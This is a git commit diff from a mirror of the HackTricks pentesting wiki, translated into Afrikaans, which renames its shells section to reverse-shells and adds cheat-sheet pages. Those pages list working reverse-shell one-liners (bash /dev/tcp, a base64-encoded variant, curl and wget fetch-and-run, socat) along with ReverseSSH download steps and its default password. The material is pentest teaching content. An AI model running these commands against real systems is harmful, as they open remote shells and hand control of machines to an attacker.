mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
Translated ['generic-methodologies-and-resources/pentesting-methodology.
This commit is contained in:
parent
70bfa89670
commit
1acd9b4de0
8 changed files with 1315 additions and 37 deletions
10
SUMMARY.md
10
SUMMARY.md
|
@ -74,11 +74,11 @@
|
|||
* [Tunneling and Port Forwarding](generic-methodologies-and-resources/tunneling-and-port-forwarding.md)
|
||||
* [Threat Modeling](generic-methodologies-and-resources/threat-modeling.md)
|
||||
* [Search Exploits](generic-methodologies-and-resources/search-exploits.md)
|
||||
* [Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/shells/README.md)
|
||||
* [MSFVenom - CheatSheet](generic-methodologies-and-resources/shells/msfvenom.md)
|
||||
* [Shells - Windows](generic-methodologies-and-resources/shells/windows.md)
|
||||
* [Shells - Linux](generic-methodologies-and-resources/shells/linux.md)
|
||||
* [Full TTYs](generic-methodologies-and-resources/shells/full-ttys.md)
|
||||
* [Reverse Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/reverse-shells/README.md)
|
||||
* [MSFVenom - CheatSheet](generic-methodologies-and-resources/reverse-shells/msfvenom.md)
|
||||
* [Reverse Shells - Windows](generic-methodologies-and-resources/reverse-shells/windows.md)
|
||||
* [Reverse Shells - Linux](generic-methodologies-and-resources/reverse-shells/linux.md)
|
||||
* [Full TTYs](generic-methodologies-and-resources/reverse-shells/full-ttys.md)
|
||||
|
||||
## 🐧 Linux Hardening
|
||||
|
||||
|
|
|
@ -1,8 +1,8 @@
|
|||
# Pentesting Metodologie
|
||||
|
||||
{% hint style="success" %}
|
||||
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
Leer & oefen AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Leer & oefen GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -10,7 +10,7 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
|
|||
|
||||
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
|
||||
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* **Deel hacking truuks deur PRs in te dien aan die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
@ -50,18 +50,18 @@ Die eerste ding om te doen wanneer jy **soek na kwesbaarhede in 'n host** is om
|
|||
|
||||
### **4-** [Soek diens weergawe exploits](search-exploits.md)
|
||||
|
||||
Sodra jy weet watter dienste loop, en dalk hul weergawe, moet jy **soek na bekende kwesbaarhede**. Miskien het jy geluk en daar is 'n exploit om vir jou 'n shell te gee...
|
||||
Sodra jy weet watter dienste loop, en dalk hul weergawe, moet jy **soek na bekende kwesbaarhede**. Miskien het jy geluk en daar is 'n exploit om jou 'n shell te gee...
|
||||
|
||||
### **5-** Pentesting Dienste
|
||||
|
||||
As daar nie enige fancy exploit vir enige lopende diens is nie, moet jy soek na **gewone misconfigurasies in elke diens wat loop.**
|
||||
|
||||
**Binne hierdie boek sal jy 'n gids vind om die mees algemene dienste te pentest** (en ander wat nie so algemeen is nie)**. Asseblief, soek in die linkerindeks die** _**PENTESTING**_ **afdeling** (die dienste is georden volgens hul standaard poorte).
|
||||
**Binne hierdie boek sal jy 'n gids vind om die mees algemene dienste te pentest** (en ander wat nie so algemeen is nie)**. Soek asseblief in die linkerindeks die** _**PENTESTING**_ **afdeling** (die dienste is georden volgens hul standaard poorte).
|
||||
|
||||
**Ek wil 'n spesiale vermelding maak van die** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **deel (aangesien dit die mees uitgebreide een is).**\
|
||||
Ook, 'n klein gids oor hoe om [**bekende kwesbaarhede in sagteware te vind**](search-exploits.md) kan hier gevind word.
|
||||
|
||||
**As jou diens nie in die indeks is nie, soek in Google** vir ander tutoriaal en **laat my weet as jy wil hê ek moet dit byvoeg.** As jy **niks kan vind** in Google nie, voer jou **eie blinde pentesting** uit, jy kan begin deur **aan die diens te koppel, dit te fuzz en die antwoorde te lees** (indien enige).
|
||||
**As jou diens nie in die indeks is nie, soek in Google** vir ander tutoriaal en **laat weet as jy wil hê ek moet dit byvoeg.** As jy **niks kan vind** in Google nie, voer jou **eie blinde pentesting** uit, jy kan begin deur **aan die diens te koppel, dit te fuzz en die antwoorde te lees** (indien enige).
|
||||
|
||||
#### 5.1 Outomatiese Gereedskap
|
||||
|
||||
|
@ -73,11 +73,11 @@ In sommige scenario's kan 'n **Brute-Force** nuttig wees om 'n **diens** te **ko
|
|||
|
||||
### 6- [Phishing](phishing-methodology/)
|
||||
|
||||
As jy op hierdie punt nie enige interessante kwesbaarheid gevind het nie, mag jy **moet probeer om 'n paar phishing** om binne die netwerk te kom. Jy kan my phishing metodologie [hier](phishing-methodology/) lees:
|
||||
As jy op hierdie punt nie enige interessante kwesbaarheid gevind het nie, **moet jy dalk probeer om 'n bietjie phishing** om binne die netwerk te kom. Jy kan my phishing metodologie [hier](phishing-methodology/) lees:
|
||||
|
||||
### **7-** [**Kry Shell**](shells/)
|
||||
### **7-** [**Kry Shell**](reverse-shells/)
|
||||
|
||||
Op een of ander manier moet jy 'n **manier gevind het om kode** in die slagoffer uit te voer. Dan, [‘n lys van moontlike gereedskap binne die stelsel wat jy kan gebruik om 'n omgekeerde shell te kry, sal baie nuttig wees](shells/).
|
||||
Op een of ander manier moet jy 'n **manier gevind het om kode** in die slagoffer uit te voer. Dan, [‘n lys van moontlike gereedskap binne die stelsel wat jy kan gebruik om 'n omgekeerde shell te kry, sal baie nuttig wees](reverse-shells/).
|
||||
|
||||
Veral in Windows mag jy hulp nodig hê om **antivirusse te vermy**: [**Kyk na hierdie bladsy**](../windows-hardening/av-bypass.md)**.**\\
|
||||
|
||||
|
@ -91,32 +91,32 @@ As jy probleme met die shell het, kan jy hier 'n klein **samestelling van die nu
|
|||
|
||||
### **9 -** [**Exfiltrasie**](exfiltration.md)
|
||||
|
||||
Jy sal waarskynlik **sommige data van die slagoffer moet onttrek** of selfs **iets** (soos privilige eskalasie skripte) moet **invoer**. **Hier het jy 'n** [**pos oor algemene gereedskap wat jy met hierdie doeleindes kan gebruik**](exfiltration.md)**.**
|
||||
Jy sal waarskynlik moet **data uit die slagoffer onttrek** of selfs **iets inbring** (soos voorregverhoging skrifte). **Hier het jy 'n** [**pos oor algemene gereedskap wat jy met hierdie doeleindes kan gebruik**](exfiltration.md)**.**
|
||||
|
||||
### **10- Privilege Eskalasie**
|
||||
### **10- Voorregverhoging**
|
||||
|
||||
#### **10.1- Plaaslike Privesc**
|
||||
|
||||
As jy **nie root/Administrator** binne die boks is nie, moet jy 'n manier vind om **privileges te eskaleer.**\
|
||||
Hier kan jy 'n **gids vind om privileges plaaslik in** [**Linux**](../linux-hardening/privilege-escalation/) **en in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)** te eskaleer.**\
|
||||
As jy **nie root/Administrator** binne die boks is nie, moet jy 'n manier vind om **voorregte te verhoog.**\
|
||||
Hier kan jy 'n **gids vind om voorregte plaaslik in** [**Linux**](../linux-hardening/privilege-escalation/) **en in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)** te verhoog.**\
|
||||
Jy moet ook hierdie bladsye oor hoe **Windows werk** nagaan:
|
||||
|
||||
* [**Outentisering, Akrediteer, Token privileges en UAC**](../windows-hardening/authentication-credentials-uac-and-efs/)
|
||||
* [**Outentisering, Akrediteer, Token voorregte en UAC**](../windows-hardening/authentication-credentials-uac-and-efs/)
|
||||
* Hoe [**NTLM werk**](../windows-hardening/ntlm/)
|
||||
* Hoe om [**akrediteer te steel**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md) in Windows
|
||||
* Sommige truuks oor [_**Aktiewe Gids**_](../windows-hardening/active-directory-methodology/)
|
||||
|
||||
**Moet nie vergeet om die beste gereedskap te kyk om Windows en Linux plaaslike Privilege Eskalasie paaie te enumerate nie:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
|
||||
**Moet nie vergeet om die beste gereedskap te kyk om Windows en Linux plaaslike Voorregverhoging paaie te enumerate nie:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
|
||||
|
||||
#### **10.2- Domein Privesc**
|
||||
|
||||
Hier kan jy 'n [**metodologie vind wat die mees algemene aksies verduidelik om te enumerate, privileges te eskaleer en volharding op 'n Aktiewe Gids**](../windows-hardening/active-directory-methodology/). Alhoewel dit net 'n subafdeling van 'n afdeling is, kan hierdie proses **uiters delikaat** wees op 'n Pentesting/Red Team opdrag.
|
||||
Hier kan jy 'n [**metodologie vind wat die mees algemene aksies verduidelik om te enumerate, voorregte te verhoog en volharding op 'n Aktiewe Gids**](../windows-hardening/active-directory-methodology/). Alhoewel dit net 'n subafdeling van 'n afdeling is, kan hierdie proses **uiters delikaat** wees op 'n Pentesting/Red Team opdrag.
|
||||
|
||||
### 11 - POST
|
||||
|
||||
#### **11**.1 - Plundering
|
||||
|
||||
Kyk of jy meer **wagwoorde** binne die host kan vind of as jy **toegang het tot ander masjiene** met die **privileges** van jou **gebruiker**.\
|
||||
Kyk of jy meer **wagwoorde** binne die host kan vind of as jy **toegang het tot ander masjiene** met die **voorregte** van jou **gebruiker**.\
|
||||
Vind hier verskillende maniere om [**wagwoorde in Windows te dump**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md).
|
||||
|
||||
#### 11.2 - Volharding
|
||||
|
@ -129,8 +129,8 @@ TODO: Voltooi volharding Post in Windows & Linux
|
|||
### 12 - Pivoting
|
||||
|
||||
Met die **versamelde akrediteer** kan jy toegang tot ander masjiene hê, of dalk moet jy **nuwe hosts ontdek en skandeer** (begin die Pentesting Metodologie weer) binne nuwe netwerke waar jou slagoffer gekoppel is.\
|
||||
In hierdie geval kan tunneling nodig wees. Hier kan jy [**'n pos oor tunneling**](tunneling-and-port-forwarding.md) vind.\
|
||||
Jy moet beslis ook die pos oor [Aktiewe Gids pentesting Metodologie](../windows-hardening/active-directory-methodology/) nagaan. Daar sal jy koel truuks vind om lateraal te beweeg, privileges te eskaleer en akrediteer te dump.\
|
||||
In hierdie geval kan tonnelering nodig wees. Hier kan jy [**'n pos oor tonnelering vind**](tunneling-and-port-forwarding.md).\
|
||||
Jy moet beslis ook die pos oor [Aktiewe Gids pentesting Metodologie](../windows-hardening/active-directory-methodology/) nagaan. Daar sal jy oulike truuks vind om lateraal te beweeg, voorregte te verhoog en akrediteer te dump.\
|
||||
Kyk ook na die bladsy oor [**NTLM**](../windows-hardening/ntlm/), dit kan baie nuttig wees om op Windows omgewings te pivot.
|
||||
|
||||
### MEER
|
||||
|
@ -139,7 +139,7 @@ Kyk ook na die bladsy oor [**NTLM**](../windows-hardening/ntlm/), dit kan baie n
|
|||
|
||||
#### **Exploitering**
|
||||
|
||||
* [**Basiese Linux Exploitering**](broken-reference)
|
||||
* [**Basiese Linux Exploitering**](broken-reference/)
|
||||
* [**Basiese Windows Exploitering**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
|
||||
* [**Basiese exploitering gereedskap**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/)
|
||||
|
||||
|
@ -158,8 +158,8 @@ As jy belangstel in 'n **hacking loopbaan** en die onhackbare hack - **ons huur
|
|||
{% embed url="https://www.stmcyber.com/careers" %}
|
||||
|
||||
{% hint style="success" %}
|
||||
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
Leer & oefen AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Leer & oefen GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -167,7 +167,7 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
|
|||
|
||||
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
|
||||
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* **Deel hacking truuks deur PRs in te dien aan die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
36
generic-methodologies-and-resources/reverse-shells/README.md
Normal file
36
generic-methodologies-and-resources/reverse-shells/README.md
Normal file
|
@ -0,0 +1,36 @@
|
|||
{% hint style="success" %}
|
||||
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Ondersteun HackTricks</summary>
|
||||
|
||||
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
|
||||
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# [**Shells - Linux**](linux.md)
|
||||
|
||||
# [**Shells - Windows**](windows.md)
|
||||
|
||||
# [**MSFVenom - CheatSheet**](msfvenom.md)
|
||||
|
||||
# [**Full TTYs**](full-ttys.md)
|
||||
|
||||
# **Outomaties gegenereerde shells**
|
||||
|
||||
* [**https://reverse-shell.sh/**](https://reverse-shell.sh/)
|
||||
* [**https://www.revshells.com/**](https://www.revshells.com/)
|
||||
* [**https://github.com/ShutdownRepo/shellerator**](https://github.com/ShutdownRepo/shellerator)
|
||||
* [**https://github.com/0x00-0x00/ShellPop**](https://github.com/0x00-0x00/ShellPop)
|
||||
* [**https://github.com/cybervaca/ShellReverse**](https://github.com/cybervaca/ShellReverse)
|
||||
* [**https://liftoff.github.io/pyminifier/**](https://liftoff.github.io/pyminifier/)
|
||||
* [**https://github.com/xct/xc/**](https://github.com/xct/xc/)
|
||||
* [**https://weibell.github.io/reverse-shell-generator/**](https://weibell.github.io/reverse-shell-generator/)
|
||||
* [**https://github.com/t0thkr1s/revshellgen**](https://github.com/t0thkr1s/revshellgen)
|
||||
* [**https://github.com/mthbernardes/rsg**](https://github.com/mthbernardes/rsg)
|
134
generic-methodologies-and-resources/reverse-shells/full-ttys.md
Normal file
134
generic-methodologies-and-resources/reverse-shells/full-ttys.md
Normal file
|
@ -0,0 +1,134 @@
|
|||
# Volle TTYs
|
||||
|
||||
{% hint style="success" %}
|
||||
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Ondersteun HackTricks</summary>
|
||||
|
||||
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
|
||||
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## Volle TTY
|
||||
|
||||
Let daarop dat die shell wat jy in die `SHELL` veranderlike stel **moet** wees **gelys binne** _**/etc/shells**_ of `Die waarde vir die SHELL veranderlike is nie in die /etc/shells lêer gevind nie. Hierdie voorval is gerapporteer`. Let ook daarop dat die volgende snippette slegs in bash werk. As jy in 'n zsh is, verander na 'n bash voordat jy die shell verkry deur `bash` te loop.
|
||||
|
||||
#### Python
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
python3 -c 'import pty; pty.spawn("/bin/bash")'
|
||||
|
||||
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
{% hint style="info" %}
|
||||
Jy kan die **aantal** **rye** en **kolomme** kry deur **`stty -a`** uit te voer
|
||||
{% endhint %}
|
||||
|
||||
#### script
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
script /dev/null -qc /bin/bash #/dev/null is to not store anything
|
||||
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
#### socat
|
||||
```bash
|
||||
#Listener:
|
||||
socat file:`tty`,raw,echo=0 tcp-listen:4444
|
||||
|
||||
#Victim:
|
||||
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
|
||||
```
|
||||
### **Spawn shells**
|
||||
|
||||
* `python -c 'import pty; pty.spawn("/bin/sh")'`
|
||||
* `echo os.system('/bin/bash')`
|
||||
* `/bin/sh -i`
|
||||
* `script -qc /bin/bash /dev/null`
|
||||
* `perl -e 'exec "/bin/sh";'`
|
||||
* perl: `exec "/bin/sh";`
|
||||
* ruby: `exec "/bin/sh"`
|
||||
* lua: `os.execute('/bin/sh')`
|
||||
* IRB: `exec "/bin/sh"`
|
||||
* vi: `:!bash`
|
||||
* vi: `:set shell=/bin/bash:shell`
|
||||
* nmap: `!sh`
|
||||
|
||||
## ReverseSSH
|
||||
|
||||
'n gerieflike manier vir **interaktiewe skulp toegang**, sowel as **lêer oordragte** en **poort forwarding**, is om die staties-gekoppelde ssh bediener [ReverseSSH](https://github.com/Fahrj/reverse-ssh) op die teiken te plaas.
|
||||
|
||||
Hieronder is 'n voorbeeld vir `x86` met upx-gecomprimeerde binêre. Vir ander binêre, kyk na die [releases page](https://github.com/Fahrj/reverse-ssh/releases/latest/).
|
||||
|
||||
1. Berei plaaslik voor om die ssh poort forwarding versoek te vang:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
# Drop it via your preferred way, e.g.
|
||||
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
|
||||
|
||||
/dev/shm/reverse-ssh -v -l -p 4444
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
* (2a) Linux teiken:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
# Drop it via your preferred way, e.g.
|
||||
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
|
||||
|
||||
/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
* (2b) Windows 10 teiken (vir vroeëre weergawes, kyk na [projek leesmy] (https://github.com/Fahrj/reverse-ssh#features)):
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
# Drop it via your preferred way, e.g.
|
||||
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe
|
||||
|
||||
reverse-ssh.exe -p 4444 kali@10.0.0.2
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
* As die ReverseSSH poort forwarding versoek suksesvol was, behoort jy nou in staat te wees om in te log met die standaard wagwoord `letmeinbrudipls` in die konteks van die gebruiker wat `reverse-ssh(.exe)` uitvoer:
|
||||
```bash
|
||||
# Interactive shell access
|
||||
ssh -p 8888 127.0.0.1
|
||||
|
||||
# Bidirectional file transfer
|
||||
sftp -P 8888 127.0.0.1
|
||||
```
|
||||
## Geen TTY
|
||||
|
||||
As jy om een of ander rede nie 'n volle TTY kan verkry nie, kan jy **nog steeds met programme interaksie hê** wat gebruikersinvoer verwag. In die volgende voorbeeld word die wagwoord aan `sudo` gegee om 'n lêer te lees:
|
||||
```bash
|
||||
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
|
||||
```
|
||||
{% hint style="success" %}
|
||||
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Ondersteun HackTricks</summary>
|
||||
|
||||
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
|
||||
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
362
generic-methodologies-and-resources/reverse-shells/linux.md
Normal file
362
generic-methodologies-and-resources/reverse-shells/linux.md
Normal file
|
@ -0,0 +1,362 @@
|
|||
# Shells - Linux
|
||||
|
||||
{% hint style="success" %}
|
||||
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Ondersteun HackTricks</summary>
|
||||
|
||||
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
|
||||
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**Probeer Hard Sekuriteitsgroep**
|
||||
|
||||
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||||
|
||||
***
|
||||
|
||||
**As jy vrae het oor enige van hierdie shells kan jy dit nagaan met** [**https://explainshell.com/**](https://explainshell.com)
|
||||
|
||||
## Volle TTY
|
||||
|
||||
**Sodra jy 'n omgekeerde shell kry**[ **lees hierdie bladsy om 'n volle TTY te verkry**](full-ttys.md)**.**
|
||||
|
||||
## Bash | sh
|
||||
```bash
|
||||
curl https://reverse-shell.sh/1.1.1.1:3000 | bash
|
||||
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
|
||||
bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
|
||||
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
|
||||
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done
|
||||
|
||||
#Short and bypass (credits to Dikline)
|
||||
(sh)0>/dev/tcp/10.10.10.10/9091
|
||||
#after getting the previous shell to get the output to execute
|
||||
exec >&0
|
||||
```
|
||||
Moet nie vergeet om met ander shells te kyk nie: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, en bash.
|
||||
|
||||
### Simbool veilige shell
|
||||
```bash
|
||||
#If you need a more stable connection do:
|
||||
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'
|
||||
|
||||
#Stealthier method
|
||||
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
|
||||
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
|
||||
```
|
||||
#### Shell verduideliking
|
||||
|
||||
1. **`bash -i`**: Hierdie deel van die opdrag begin 'n interaktiewe (`-i`) Bash-skal.
|
||||
2. **`>&`**: Hierdie deel van die opdrag is 'n afgekorte notasie vir **om beide standaarduitset** (`stdout`) en **standaardfout** (`stderr`) na die **dieselfde bestemming** te herlei.
|
||||
3. **`/dev/tcp/<ATTACKER-IP>/<PORT>`**: Dit is 'n spesiale lêer wat **'n TCP-verbinding na die gespesifiseerde IP-adres en poort** verteenwoordig.
|
||||
* Deur **die uitset en foutstrome na hierdie lêer te herlei**, stuur die opdrag effektief die uitset van die interaktiewe skalsessie na die aanvaller se masjien.
|
||||
4. **`0>&1`**: Hierdie deel van die opdrag **herlei standaardinvoer (`stdin`) na die dieselfde bestemming as standaarduitset (`stdout`)**.
|
||||
|
||||
### Skep in lêer en voer uit
|
||||
```bash
|
||||
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
|
||||
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
|
||||
```
|
||||
## Forward Shell
|
||||
|
||||
